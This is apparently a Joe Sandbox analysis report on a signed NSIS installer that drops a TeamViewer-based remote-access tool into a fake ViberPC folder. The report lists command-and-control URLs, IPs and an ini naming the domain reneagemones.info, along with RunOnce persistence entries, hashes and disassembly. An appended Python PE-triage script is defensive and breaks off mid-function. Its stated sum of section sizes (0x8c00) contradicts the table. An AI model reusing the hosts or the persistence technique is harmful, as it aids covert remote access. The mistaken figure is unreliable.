  Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr; Malicious: false; Reputation: high
https://widolapsed.info/apsed.info/qWave
  Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp; Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
http://nsis.sf.net/NSIS_Error
  Source: wogZe27GBB.exe; Malicious: false; Reputation: high
http://master13.teamviewer.com/dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s
  Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp; Malicious: false; Reputation: high
http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001;
  Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmp; Malicious: false; Reputation: high
http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=1000
  Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmp; Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
https://www.roblox.com/info/privacy
  Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmp; Malicious: false; Reputation: high
http://www.g5e.com/termsofservice
  Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmp; Malicious: false; Reputation: high
http://www.teamviewer.com/company/index.aspx
  Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr; Malicious: false; Reputation: high
http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.
  Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr; Malicious: false; Reputation: high
http://www.teamviewer.com/ja/company/shutdown.aspx
  Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr; Malicious: false; Reputation: high
http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001K
  Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmp; Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002Z
  Source: UniPrint.exe, 00000005.00000003.714775003.00000000057B2000.00000004.00000001.sdmp; Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
http://crl.verisign.co
  Source: UniPrint.exe, 0000000A.00000002.757533910.0000000000B88000.00000004.00000020.sdmp; Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
http://master13.teamviewer.com/dout.aspx?s=42047152&p=10000001&client=DynGate&data=FyQS8QAjHqmyuig6s
  Source: UniPrint.exe, 00000005.00000002.1073127658.0000000000B5D000.00000004.00000020.sdmp; Malicious: false; Reputation: high
http://master13.teamviewer.com/dout.aspx?s=42047224&p=10000001&client=DynGate&data=FyQS6wChtjSytzoeq
  Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000003.713565888.000000000576A000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000003.713161991.00000000057D0000.00000004.00000001.sdmp; Malicious: false; Reputation: high
http://www.teamviewer.com/ja/licensing/commercialuse.aspx
  Source: UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp; Malicious: false; Reputation: high
https://www.teamviewer.com/licensing/order.aspx?lng=ja
  Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr; Malicious: false; Reputation: high

                                                                                                                  Contacted IPs


                                                                                                                  Public

IP               Domain                   Country  ASN    ASN Name                                          Malicious
188.172.235.146  unknown                  Austria  42473  AS-ANEXIA ANEXIA Internetdienstleistungs GmbH AT  false
185.188.32.23    master13.teamviewer.com  Germany  43304  TEAMVIEWER-AS DE                                  false
45.153.241.148   widolapsed.info          Germany  30823  COMBAHTON combahton GmbH DE                       false

                                                                                                                  Private

                                                                                                                  IP
                                                                                                                  192.168.2.1
                                                                                                                  127.0.0.1

                                                                                                                  General Information

                                                                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                  Analysis ID:483790
                                                                                                                  Start date:15.09.2021
                                                                                                                  Start time:14:00:47
                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                  Overall analysis duration:0h 15m 11s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:light
                                                                                                                  Sample file name:wogZe27GBB.exe
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                  Run name:Run with higher sleep bypass
Number of new started processes analysed:23
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • HDC enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal72.evad.winEXE@13/7@4/5
                                                                                                                  EGA Information:Failed
                                                                                                                  HDC Information:
                                                                                                                  • Successful, ratio: 28.3% (good quality ratio 27.6%)
                                                                                                                  • Quality average: 83.4%
                                                                                                                  • Quality standard deviation: 24.3%
                                                                                                                  HCA Information:Failed
                                                                                                                  Cookbook Comments:
                                                                                                                  • Adjust boot time
                                                                                                                  • Enable AMSI
                                                                                                                  • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                  Warnings:
                                                                                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
                                                                                                                  • TCP Packets have been reduced to 100
                                                                                                                  • Excluded IPs from analysis (whitelisted): 92.122.145.220, 20.82.209.104, 20.54.110.249, 40.112.88.60, 23.216.77.208, 23.216.77.209, 20.50.102.62
                                                                                                                  • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                  Simulations

                                                                                                                  Behavior and APIs

Time      Type       Description
14:02:08  Autostart  Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe" f
14:02:16  Autostart  Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe" f

                                                                                                                  Joe Sandbox View / Context

                                                                                                                  IPs

                                                                                                                  No context

                                                                                                                  Domains

                                                                                                                  No context

                                                                                                                  ASN

                                                                                                                  No context

                                                                                                                  JA3 Fingerprints

                                                                                                                  No context

                                                                                                                  Dropped Files

                                                                                                                  No context

                                                                                                                  Created / dropped Files

                                                                                                                  C:\Users\user\AppData\Local\Temp\nsrC1CA.tmp
                                                                                                                  Process:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5131242
                                                                                                                  Entropy (8bit):6.736055511669049
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:98304:xmfzCAW6LcJjdgHPmMogx1WZRkPapqj+ZG/D+AKbS5CjH:xmfzCgEqHuMogsRkyq0X
                                                                                                                  MD5:1E6978657EEB4A9F6B4E84C62B228EE4
                                                                                                                  SHA1:496A37AE9417163CFF53FBFEA9BA5BD1AC6BAFAE
                                                                                                                  SHA-256:0FFB6906EA4C7B9A2E97FE0B8A205E00C8E5B1A7E03038627B1E6681CC66B986
                                                                                                                  SHA-512:412332869C2B7C90A5409338EBBFF96786AEADDAA54A0BA1F0D96035E929D7DFB773A2E02F8C588F15739A3CE0211DAE6074EEFE94AE18F85B5C4FA2C6BCBC6B
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll
                                                                                                                  Process:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):73696
                                                                                                                  Entropy (8bit):6.629217484187715
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:DWNCi7sBIpvYqSRw6zhD16poDVDREv1Mme9MfPGz49jjZLq00RKi5jYjfLhs8WhU:A6BmmPX6mDVdme9uGzWH10I+Uje8WhU
                                                                                                                  MD5:AC34AB95CBC23CDF332BEA2CC0FFBF35
                                                                                                                  SHA1:43ED3DD9863791294064D2F85F3DF3F08D572037
                                                                                                                  SHA-256:4BA3BD623A9919A357708DA57BBBBC978706DAD8D57DA64E89C780147843C7CE
                                                                                                                  SHA-512:3740DFD9F8ED967953C6A3522D66B5E547D3BB2A4C618FD667A817F6283E4353E2B81E994938E989AEA89BFD7A23E41309647EDCD1F6F0A075436E5B1FEE7B0A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
• Antivirus: Metadefender, Detection: 6%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 51%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.@....................../...........................................................Rich....................PE..L...QQ.a...........!.........L............................................... ......-s....@.........................`...D.......,...................................0...................................................0............................text............................... ..`.rdata...,..........................@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\ViberPC\Icons\TeamViewer.ini
Process: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
File Type: data
Category: modified
Size (bytes): 226
Entropy (8bit): 3.2302371579115574
Encrypted: false
SSDEEP: 6:y3ADAeYlA3m7D5KTLp3cQYdlRAeYlA3m7D5KLp3gk+AeYlA3m7D5KLp3gkp:E7NQalM7NM397NM3p
MD5: D391CD3A0498B19D1DC083B30D010F4F
SHA1: 8BAFA1893DA6E63EC995E97C436E0E88BBC6E866
SHA-256: 5DD9E60CE43560D86998187E42C1B427FA034B126B90F3FFECB7282169F52D97
SHA-512: 0279F2164530EBDB9694E00CA2921BB1A9DE424E65435ABCB58FB38AFBA6A94CDAA4A6747E9EA541DED19E9B1C1D15DA00632A7AC5E1D1DED1B20A71A809B1B6
Malicious: false
Reputation: unknown
                                                                                                                  Preview: h.d.n.=.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o.....h.p.n.=./.B.8.C.6.3.1.A.8./.....h.s.n.=.1.....h.t.=.3.6.....r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.
C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll
Process: C:\Users\user\Desktop\wogZe27GBB.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 607528
Entropy (8bit): 6.564133582926054
Encrypted: false
SSDEEP: 6144:r5hmfFy7ZJ0uUCAD06v7JlHZctms+2lifZ0iMe8d6YySkYQKMDqtAu3NhgGy6wSP:Vhmf4ACAzneosEi6YhvAuUGyUrNJbL
MD5: 554EE592B125CFDF81B376B5C24AA61C
SHA1: 666D2C04171246734575D4453289AA2D9AF93B97
SHA-256: B296EF421D5B7F569E623D41A42D87A064C4358CFA89A192988F854929E3ABD1
SHA-512: 6C3111BF9D26929D426797EBDD8D804B34E2E8F593BF488298E70964538F2DA3D971C4ED3C3237C829AE7DE4FDB8D4316D84F153E93E3788808547A8538B73F5
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Reputation: unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-T.L:..L:..L:...F..L:...B..L:.Rich.L:.........PE..L.....LK...........!.........................................................0.......................................................................0..(.... .......................................................................................rsrc...............................@..@.reloc....... ....... ..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Process: C:\Users\user\Desktop\wogZe27GBB.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 4375848
Entropy (8bit): 6.621789733656387
Encrypted: false
SSDEEP: 98304:6jdgHPmMogx1WZRkPapqj+ZG/D+AKbS5m:4qHuMogsRkyq0N
MD5: EBDBA07BFABCF24F5D79EF27247EA643
SHA1: A3A7498F02BAB188B3944382BBA4D016D63607D1
SHA-256: D2CDCA8EFA27089D3DEAD0CCEAFBE470B3815C9C2A362C007D1F516E5379AC92
SHA-512: 412B42C540A9FE41709453D725B7A1E888849326A70A411E645F29240D730D69EBCF4B26E6870D33E0A395C612470BD00064025D22B0C6BCD211242E8EF6CEA6
Malicious: true
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Reputation: unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............o...o...o.......o.......o.....2.o.....q.o.F.2...o...n...o.......o.F.0...o.......o.......o.......o.Rich..o.................PE..L.....LK..................3.........F........03...@...........................K......ZC.......................................@...... K.8`............B.(...........pe4......................x:.....`x:.@............03. ............................text.....3.......3................. ..`.rdata..&....03.......3.............@..@.data...h....P@.."...*@.............@....tls..........K......LB.............@....rsrc...8`... K..b...NB.............@..@........................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\ViberPC\Icons\vpn.cab
Process: C:\Users\user\Desktop\wogZe27GBB.exe
File Type: Microsoft Cabinet archive data, 71196 bytes, 8 files
Category: dropped
Size (bytes): 71196
Entropy (8bit): 7.996182851828797
Encrypted: true
SSDEEP: 1536:qUTRtkxXFuG1DKNYCqRBiFxMZPQCJh/njgG5+jC5hA101pNO0:qUNtax12mCqRBiyQG/jgG5+j2NO0
MD5: 8A84AA1B9F20DC194947D7AC592D818E
SHA1: 4A77AB0D59F39BF600BB89D9121446F6AA2D139B
SHA-256: 8A740BE5D92B734E77B210354988DFD49F31C49814240513CF4B0353A8CE6DFB
SHA-512: B3F90ADB48861CD775F15E75885C81A130D62DFE429A5833FA1CE0BC203EEA15BD8A7306618B1F4D27810493300400C8B149D58032F90F0E9D93B04F9B8F1050
Malicious: false
Reputation: unknown
                                                                                                                  Preview: MSCF............,...............JA..H........)........k<'b..64\teamviewervpn.cat......)....k<'b..64\TeamViewerVPN.inf.(....>....k<'b..64\teamviewervpn.sys..<........k<&b..64\install.exe..)........k<'b..86\teamviewervpn.cat......-....k<'b..86\TeamViewerVPN.inf..b...B....k<'b..86\teamviewervpn.sys...........k<&b..86\install.exe.h.t"X<..[.....`.....@...N.f.|..U.......$."..L.F..4....|....U$Q/...%.J).D...@F.......f...9..../@.x;.N..w..2...i1P.....O.....T...T.y...``...;.$.&....@........@..~..\...J.44...:.@....M.....x\.0c|..W...,.|.x..+.P..N.. ..S0@B.;?.(..B..,.%.{.. ....(T.....U.5..=.3'rxci.;....P$..H)...1...h._e..{....Q._..}...K......U.s...._..WRWlS.8.._...D.NI..>.|O<..q...$0.EA*8d...../..=@2q...g_.Hs|`+...`.>U..)X.G*.8.....>..!4 ....}..Ps.a.8.......4.0`._t%...P.qgr..'..~.d..r.....o...w..q........,O.K..Y.8..M.D...p........~.....O?......}@.....>....O..N...c../p..[....._=.~.S....Q..p.O...@.WL....*..}..%1...3a.....u...)..K.Y...s..E;...".e.....X0(IR..'..1...\..6...(i

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.995528478877956
TrID:
• Win32 Executable (generic) a (10002005/4) 92.16%
• NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: wogZe27GBB.exe
File size: 1773472
MD5: 5efc68abd7fec415e34980d95a06a66a
SHA1: 34b243a0b3e322b8983b528caa5849395360a91d
SHA256: 0f655a8ac0d7fdc7ac44fdd9799129848faf9c73bfa0e108fd903de439447232
SHA512: 92aa33884c54bdb2608994b3e4c9b0909b002a38344bae2b4fb01c9a713542cf8a51684a0e3d614730340a995bb918dedb5e4c801ba9e3afa834399f38232079
SSDEEP: 49152:tMvOJUaiTddo110aPENuUn/vrmUJjefHj9uDd:tHjiTvLn3rb4jkd
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L.....*J.................\.........

File Icon

Icon Hash: 8282c2d2d2c292a1

Static PE Info

General

Entrypoint: 0x40323c
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x4A2AE2A2 [Sat Jun 6 21:41:54 2009 UTC]
TLS Callbacks: (none)
CLR (.Net) Version: (none)
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 5bd07784f328e868356a895d4ab1a505

Authenticode Signature

Signature Valid: true
Signature Issuer: CN=Sectigo RSA Code Signing CA, O=Sectigo Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error: The operation completed successfully
Error Number: 0
Not Before: 4/21/2021 2:00:00 AM
Not After: 4/22/2022 1:59:59 AM
Subject Chain:
• CN=Mapping OOO, O=Mapping OOO, L=Saint Petersburg, C=RU
Version: 3
Thumbprint MD5: B9C33DB697628B5EB88B4004D0D6900E
Thumbprint SHA-1: D9F41380CE8E8E22E2EF7F558D6D17BB94AA28BE
Thumbprint SHA-256: 7B5C783B055EB8BA37480ED0E990E3A4631D38531485ECF3875FE213B2FB661D
Serial: 00A46F9D8784778BAA48167C48BBC56F30

Entrypoint Preview

Instruction:
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409130h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407030h]
push 00008001h
call dword ptr [004070B4h]
push ebx
call dword ptr [0040727Ch]
push 00000008h
mov dword ptr [00423F58h], eax
call 00007F3D8499C76Eh
mov dword ptr [00423EA4h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 0041F458h
call dword ptr [00407158h]
push 004091B8h
push 004236A0h
call 00007F3D8499C421h
call dword ptr [004070B0h]
mov edi, 00429000h
push eax
push edi
call 00007F3D8499C40Fh
push ebx
call dword ptr [0040710Ch]
cmp byte ptr [00429000h], 00000022h
mov dword ptr [00423EA0h], eax
mov eax, edi
jne 00007F3D84999B6Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00429001h
push dword ptr [esp+14h]
push eax
call 00007F3D8499BF02h
push eax
call dword ptr [0040721Ch]
mov dword ptr [esp+1Ch], eax
jmp 00007F3D84999BC5h
cmp cl, 00000020h
jne 00007F3D84999B68h
inc eax
cmp byte ptr [eax], 00000020h
je 00007F3D84999B5Ch
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x73a4           0xb4          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x44000          0x13d8        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x1aefc0         0x1fe0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type     Entropy        Characteristics
.text   0x1000           0x5a5a        0x5c00    False     0.660453464674   data          6.41769823686  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x7000           0x1190        0x1200    False     0.375217013889   SysEx File -  4.24219639454  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x9000           0x1af98       0x400     False     0.55859375       data          4.70902740305  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata  0x24000          0x20000       0x0       False     0                empty         0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc   0x44000          0x13d8        0x1400    False     0.2705078125     data          3.94953591447  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
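
The sections and data directories carry two signals worth checking on any installer-like sample. The first is per-section entropy: 6.4 for .text is ordinary compiled code, while a section above roughly 7 bits per byte is usually packed or encrypted. The second is where the certificate table sits. IMAGE_DIRECTORY_ENTRY_SECURITY holds a raw file offset rather than an RVA, and here that offset (0x1aefc0) lies far beyond the section raw data (the raw sizes sum to 0x8c00 bytes), so most of the file is overlay: bytes outside every section that the per-section statistics above never see. The following Python is an added example, not part of the Joe Sandbox report and not the sample's own code. It parses a PE with only the standard library, computes section entropy, measures the overlay and reports whether the certificate table lies inside it. The fixture it builds is a constructed minimal PE32, not the analysed file; run the same `triage()` on the real bytes to compare against the table.

```python
import math
import struct
from collections import Counter

IMAGE_DIRECTORY_ENTRY_SECURITY = 4  # certificate table; its "VirtualAddress" is a raw file offset


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty or constant data, 8.0 for uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_pe(blob: bytes) -> dict:
    """Parse just enough of a PE32/PE32+ image to get the section table, the certificate
    directory entry and the overlay (bytes after the last section's raw data)."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    file_hdr = e_lfanew + 4
    _machine, nsec, _, _, _, opt_size, _chars = struct.unpack_from("<HHIIIHH", blob, file_hdr)
    opt = file_hdr + 20
    magic = struct.unpack_from("<H", blob, opt)[0]
    if magic == 0x10B:    # PE32: NumberOfRvaAndSizes at +92, directories at +96
        count_off, dirs_off = 92, 96
    elif magic == 0x20B:  # PE32+: the 64-bit fields push both by 16 bytes
        count_off, dirs_off = 108, 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    ndirs = struct.unpack_from("<I", blob, opt + count_off)[0]
    dirs = [struct.unpack_from("<II", blob, opt + dirs_off + 8 * i) for i in range(ndirs)]
    sec_tbl = opt + opt_size
    sections = []
    for i in range(nsec):
        off = sec_tbl + 40 * i
        name = blob[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", blob, off + 8)
        sections.append({"name": name, "va": va, "vsize": vsize, "raw_ptr": raw_ptr,
                         "raw_size": raw_size,
                         "entropy": shannon_entropy(blob[raw_ptr:raw_ptr + raw_size])})
    end = max((s["raw_ptr"] + s["raw_size"] for s in sections), default=sec_tbl + 40 * nsec)
    cert_off, cert_size = dirs[IMAGE_DIRECTORY_ENTRY_SECURITY] if ndirs > IMAGE_DIRECTORY_ENTRY_SECURITY else (0, 0)
    return {"sections": sections, "overlay_offset": end, "overlay_size": len(blob) - end,
            "cert_offset": cert_off, "cert_size": cert_size}


def triage(blob: bytes) -> list:
    """Findings matching the report's tables: high-entropy sections, sections whose
    in-memory size dwarfs the on-disk size, an overlay, and a certificate table in it."""
    info = parse_pe(blob)
    findings = []
    for s in info["sections"]:
        if s["entropy"] >= 7.0:
            findings.append(f"{s['name']}: entropy {s['entropy']:.2f}, likely packed or encrypted")
        if s["raw_size"] and s["vsize"] > 4 * s["raw_size"]:
            findings.append(f"{s['name']}: virtual size {s['vsize']:#x} >> raw size {s['raw_size']:#x}")
    if info["overlay_size"] > 0:
        payload = info["overlay_size"]
        if info["cert_size"] and info["cert_offset"] >= info["overlay_offset"]:
            payload -= info["cert_size"]  # assumes the certificate is the tail of the overlay
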